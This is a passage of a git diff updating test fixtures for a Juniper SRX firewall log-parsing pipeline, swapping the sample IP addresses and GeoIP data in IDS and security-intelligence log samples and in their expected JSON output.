[junos@67.43.156.15 attack-name="SYN flood!" source-address="67.43.156.15" source-port="40001" destination-address=67.43.156.15" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@67.43.156.15 attack-name="UDP flood!" source-address="67.43.156.15" source-port="40001" destination-address="67.43.156.15" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@67.43.156.15 attack-name="ICMP fragment!" source-address="67.43.156.15" destination-address="67.43.156.15" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Record Route IP option!" source-address="67.43.156.15" destination-address="67.43.156.15" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Tunnel GRE 6in6!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Tunnel GRE 4in4!" source-address="67.43.156.13" destination-address="67.43.156.15" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@67.43.156.15 attack-name="SYN flood!" destination-address=67.43.156.15" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"] +<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@67.43.156.15 attack-name="SYN flood!" source-address="67.43.156.15" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"] +<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="TCP port scan!" source-address="10.1.1.100" source-port="50630" destination-address="10.1.1.1" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="FIN but no ACK bit!" source-address="10.1.1.100" source-port="42799" destination-address="10.1.1.1" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"] diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json index 28498dd3c39..c97c7b662c6 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json @@ -3,42 +3,42 @@ { "server": { "port": 1433, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 1433, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 6000, - "ip": "81.2.69.145" + "ip": "67.43.156.13" }, "juniper": { "srx": { @@ -69,18 +69,18 @@ }, "related": { "ip": [ - "81.2.69.145", - "81.2.69.193" + "67.43.156.13", + "67.43.156.14" ] }, "client": { "port": 6000, - "ip": "81.2.69.145" + "ip": "67.43.156.13" }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660111986Z", - "original": "\u003c11\u003e1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.137 attack-name=\"TCP sweep!\" source-address=\"81.2.69.145\" source-port=\"6000\" destination-address=\"81.2.69.193\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302494600Z", + "original": "\u003c11\u003e1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP sweep!\" source-address=\"67.43.156.13\" source-port=\"6000\" destination-address=\"67.43.156.14\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", "kind": "alert", "action": "sweep_detected", "category": [ @@ -167,8 +167,8 @@ }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660119229Z", - "original": "\u003c11\u003e1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.36 attack-name=\"WinNuke attack!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" source-port=\"3240\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-port=\"139\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302518100Z", + "original": "\u003c11\u003e1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"WinNuke attack!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" source-port=\"3240\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-port=\"139\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", "kind": "alert", "action": "attack_detected", "category": [ @@ -186,42 +186,42 @@ { "server": { "port": 50010, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 50010, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 40001, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -252,17 +252,17 @@ }, "related": { "ip": [ - "81.2.69.143" + "67.43.156.15" ] }, "client": { "port": 40001, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660121043Z", - "original": "\u003c11\u003e1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.40 attack-name=\"SYN flood!\" source-address=\"81.2.69.143\" source-port=\"40001\" destination-address=\"81.2.69.143\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302526500Z", + "original": "\u003c11\u003e1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=67.43.156.15\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -280,42 +280,42 @@ { "server": { "port": 53, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 53, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 40001, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -346,18 +346,17 @@ }, "related": { "ip": [ - "81.2.69.193", - "81.2.69.143" + "67.43.156.15" ] }, "client": { "port": 40001, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660122666Z", - "original": "\u003c11\u003e1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.81.2.69.143.40 attack-name=\"UDP flood!\" source-address=\"81.2.69.193\" source-port=\"40001\" destination-address=\"81.2.69.143\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302615700Z", + "original": "\u003c11\u003e1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@67.43.156.15 attack-name=\"UDP flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=\"67.43.156.15\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -374,40 +373,40 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, - "ip": "81.2.69.193" + "as": { + "number": 35908 + }, + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -438,17 +437,16 @@ }, "related": { "ip": [ - "81.2.69.193", - "81.2.69.143" + "67.43.156.15" ] }, "client": { - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660124269Z", - "original": "\u003c11\u003e1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.81.2.69.143.40 attack-name=\"ICMP fragment!\" source-address=\"81.2.69.193\" destination-address=\"81.2.69.143\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302620100Z", + "original": "\u003c11\u003e1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@67.43.156.15 attack-name=\"ICMP fragment!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "fragment_detected", "category": [ @@ -465,40 +463,40 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -532,17 +530,16 @@ }, "related": { "ip": [ - "81.2.69.193", - "81.2.69.143" + "67.43.156.15" ] }, "client": { - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660125721Z", - "original": "\u003c11\u003e1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name=\"Record Route IP option!\" source-address=\"81.2.69.193\" destination-address=\"81.2.69.143\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302625500Z", + "original": "\u003c11\u003e1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Record Route IP option!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "category": [ "network", @@ -627,8 +624,8 @@ }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660127254Z", - "original": "\u003c11\u003e1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name=\"Tunnel GRE 6in6!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302630400Z", + "original": "\u003c11\u003e1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 6in6!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "tunneling_screen", "category": [ @@ -645,40 +642,40 @@ }, { "server": { - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, - "ip": "81.2.69.193" + "as": { + "number": 35908 + }, + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, - "ip": "81.2.69.193" + "as": { + "number": 35908 + }, + "ip": "67.43.156.13" }, "juniper": { "srx": { @@ -712,16 +709,17 @@ }, "related": { "ip": [ - "81.2.69.193" + "67.43.156.13", + "67.43.156.15" ] }, "client": { - "ip": "81.2.69.193" + "ip": "67.43.156.13" }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660128717Z", - "original": "\u003c11\u003e1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name=\"Tunnel GRE 4in4!\" source-address=\"81.2.69.193\" destination-address=\"81.2.69.193\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302638100Z", + "original": "\u003c11\u003e1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 4in4!\" source-address=\"67.43.156.13\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "tunneling_screen", "category": [ @@ -738,7 +736,7 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "observer": { "name": "rtr199", @@ -758,7 +756,7 @@ }, "related": { "ip": [ - "81.2.69.143" + "67.43.156.15" ] }, "log": { @@ -766,18 +764,18 @@ }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -789,8 +787,8 @@ }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660130130Z", - "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.81.2.69.143.40 attack-name=\"SYN flood!\" destination-address=\"81.2.69.143\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", + "ingested": "2021-12-10T10:14:09.302642100Z", + "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" destination-address=67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -827,29 +825,29 @@ }, "related": { "ip": [ - "81.2.69.193" + "67.43.156.15" ] }, "log": { "level": "error" }, "client": { - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -861,8 +859,8 @@ }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660131632Z", - "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.81.2.69.143.40 attack-name=\"SYN flood!\" source-address=\"81.2.69.193\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", + "ingested": "2021-12-10T10:14:09.302646100Z", + "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -883,45 +881,18 @@ { "server": { "port": 10778, - "ip": "81.2.69.193" + "ip": "10.1.1.1" }, "log": { "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", - "location": { - "lon": -0.0931, - "lat": 51.5142 - } - }, "port": 10778, - "ip": "81.2.69.193" + "ip": "10.1.1.1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 50630, - "ip": "216.160.83.61" + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -952,18 +923,18 @@ }, "related": { "ip": [ - "216.160.83.61", - "81.2.69.193" + "10.1.1.100", + "10.1.1.1" ] }, "client": { "port": 50630, - "ip": "216.160.83.61" + "ip": "10.1.1.100" }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660133045Z", - "original": "\u003c11\u003e1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.129 attack-name=\"TCP port scan!\" source-address=\"216.160.83.61\" source-port=\"50630\" destination-address=\"81.2.69.193\" destination-port=\"10778\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302650400Z", + "original": "\u003c11\u003e1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP port scan!\" source-address=\"10.1.1.100\" source-port=\"50630\" destination-address=\"10.1.1.1\" destination-port=\"10778\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "scan_detected", "category": [ @@ -981,45 +952,18 @@ { "server": { "port": 7, - "ip": "81.2.69.193" + "ip": "10.1.1.1" }, "log": { "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", - "location": { - "lon": -0.0931, - "lat": 51.5142 - } - }, "port": 7, - "ip": "81.2.69.193" + "ip": "10.1.1.1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 42799, - "ip": "216.160.83.61" + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -1050,18 +994,18 @@ }, "related": { "ip": [ - "216.160.83.61", - "81.2.69.193" + "10.1.1.100", + "10.1.1.1" ] }, "client": { "port": 42799, - "ip": "216.160.83.61" + "ip": "10.1.1.100" }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:31.660134568Z", - "original": "\u003c11\u003e1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.129 attack-name=\"FIN but no ACK bit!\" source-address=\"216.160.83.61\" source-port=\"42799\" destination-address=\"81.2.69.193\" destination-port=\"7\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:14:09.302656Z", + "original": "\u003c11\u003e1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"FIN but no ACK bit!\" source-address=\"10.1.1.100\" source-port=\"42799\" destination-address=\"10.1.1.1\" destination-port=\"7\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "illegal_tcp_flag_detected", "category": [ diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log index f76163943a1..b8837283446 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log @@ -1,2 +1,2 @@ -<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="216.160.83.61" source-port="1" destination-address="216.160.83.61" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"] -<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="216.160.83.61" source-port="36612" destination-address="216.160.83.61" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"] +<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="67.43.156.15" source-port="1" destination-address="10.10.0.10" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"] +<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="67.43.156.15" source-port="36612" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"] diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json index f3bcdc53272..d3b6775b120 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json @@ -3,48 +3,30 @@ { "server": { "port": 24039, - "ip": "216.160.83.61" + "ip": "10.10.0.10" }, "log": { "level": "informational" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 24039, - "ip": "216.160.83.61" + "ip": "10.10.0.10" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 1, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -85,17 +67,18 @@ }, "related": { "ip": [ - "216.160.83.61" + "67.43.156.15", + "10.10.0.10" ] }, "client": { "port": 1, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:34.661591150Z", - "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"216.160.83.61\" source-port=\"1\" destination-address=\"216.160.83.61\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" 